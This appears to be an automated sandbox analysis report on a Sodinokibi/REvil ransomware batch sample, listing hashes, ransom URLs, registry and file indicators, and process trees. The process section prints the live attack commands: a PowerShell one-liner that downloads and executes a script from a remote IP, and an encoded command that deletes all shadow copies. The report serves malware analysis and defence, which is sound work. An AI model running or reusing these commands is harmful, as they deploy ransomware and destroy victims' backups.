Analysis
-
max time kernel
132s -
max time network
54s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
15-05-2020 19:19
Static task
static1
Behavioral task
behavioral1
Sample
d414776d8291887b69e7e08716350a94.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
d414776d8291887b69e7e08716350a94.bat
Resource
win10v200430
General
-
Target
d414776d8291887b69e7e08716350a94.bat
-
Size
216B
-
MD5
44b1551634044bfd5c2101792984ab6a
-
SHA1
c1c890dd032188b9c1488e5cf4ff4f22d88b74e5
-
SHA256
d3acbb0ddca79d785f4a3c766cceeb94bc468b19bfa0ba495af8182fbd9c55a4
-
SHA512
faae8800cab7d6fa3470130c293609b65607156bcb9403ac83e9cd20a4dfeea2c689287b066320dd344415d189fe9d01f2a2913f1d51c008da36b18a62bbd677
Malware Config
Extracted
http://185.103.242.78/pastes/d414776d8291887b69e7e08716350a94
Extracted
C:\3uxah42q-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B5B9A722923F5083
http://decryptor.cc/B5B9A722923F5083
Signatures
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 884 powershell.exe Token: SeDebugPrivilege 884 powershell.exe Token: SeDebugPrivilege 524 powershell.exe Token: SeBackupPrivilege 1676 vssvc.exe Token: SeRestorePrivilege 1676 vssvc.exe Token: SeAuditPrivilege 1676 vssvc.exe Token: SeTakeOwnershipPrivilege 884 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\73ml194.bmp" powershell.exe -
Drops file in Program Files directory 42 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\DismountResolve.aiff powershell.exe File opened for modification \??\c:\program files\MeasureFind.txt powershell.exe File opened for modification \??\c:\program files\SelectRegister.mp4v powershell.exe File opened for modification \??\c:\program files\UnblockConvertTo.m4v powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\3uxah42q-readme.txt powershell.exe File opened for modification \??\c:\program files\InstallSelect.aiff powershell.exe File opened for modification \??\c:\program files\NewSync.rar powershell.exe File opened for modification \??\c:\program files\UnlockWatch.3gp powershell.exe File opened for modification \??\c:\program files\CheckpointLock.tif powershell.exe File opened for modification \??\c:\program files\CloseConvertTo.M2V powershell.exe File opened for modification \??\c:\program files\CloseOptimize.ex_ powershell.exe File opened for modification \??\c:\program files\CompareConfirm.png powershell.exe File opened for modification \??\c:\program files\SelectMeasure.3g2 powershell.exe File opened for modification \??\c:\program files\UnprotectOpen.vbe powershell.exe File opened for modification \??\c:\program files\ExitBlock.mpp powershell.exe File created \??\c:\program files\microsoft sql server compact edition\3uxah42q-readme.txt powershell.exe File opened for modification \??\c:\program files\ProtectAssert.rtf powershell.exe File opened for modification \??\c:\program files\SwitchReceive.jpg powershell.exe File opened for modification \??\c:\program files\UnprotectClose.TS powershell.exe File opened for modification \??\c:\program files\AddWatch.pot powershell.exe File opened for modification \??\c:\program files\ConvertUnprotect.jpeg powershell.exe File opened for modification \??\c:\program files\HideCompare.potm powershell.exe File opened for modification \??\c:\program files\ResolveSend.xht powershell.exe File opened for modification \??\c:\program files\RegisterProtect.xlsb powershell.exe File opened for modification \??\c:\program files\SyncRestore.tif powershell.exe File opened for modification \??\c:\program files\ExitStep.css powershell.exe File opened for modification \??\c:\program files\ExpandResume.mpg powershell.exe File opened for modification \??\c:\program files\GrantSkip.dwg powershell.exe File opened for modification \??\c:\program files\ImportGrant.mpg powershell.exe File opened for modification \??\c:\program files\ProtectImport.bmp powershell.exe File opened for modification \??\c:\program files\ResumeUse.png powershell.exe File opened for modification \??\c:\program files\UnpublishSplit.vsd powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\3uxah42q-readme.txt powershell.exe File created \??\c:\program files\3uxah42q-readme.txt powershell.exe File opened for modification \??\c:\program files\ClearExit.vdx powershell.exe File opened for modification \??\c:\program files\CloseSubmit.mhtml powershell.exe File opened for modification \??\c:\program files\ExitSuspend.7z powershell.exe File opened for modification \??\c:\program files\ResumeBlock.crw powershell.exe File created \??\c:\program files (x86)\3uxah42q-readme.txt powershell.exe File opened for modification \??\c:\program files\CompressPush.html powershell.exe File opened for modification \??\c:\program files\ImportSkip.xml powershell.exe File opened for modification \??\c:\program files\RegisterConvert.wav powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 884 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1440 wrote to memory of 884 1440 cmd.exe powershell.exe PID 884 wrote to memory of 524 884 powershell.exe powershell.exe PID 884 wrote to memory of 524 884 powershell.exe powershell.exe PID 884 wrote to memory of 524 884 powershell.exe powershell.exe PID 884 wrote to memory of 524 884 powershell.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 884 powershell.exe 884 powershell.exe 884 powershell.exe 524 powershell.exe 524 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 2 884 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\d414776d8291887b69e7e08716350a94.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d414776d8291887b69e7e08716350a94');Invoke-IDZVZHFEB;Start-Sleep -s 10000"2⤵
- Suspicious use of AdjustPrivilegeToken
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
PID:884 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:524
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1676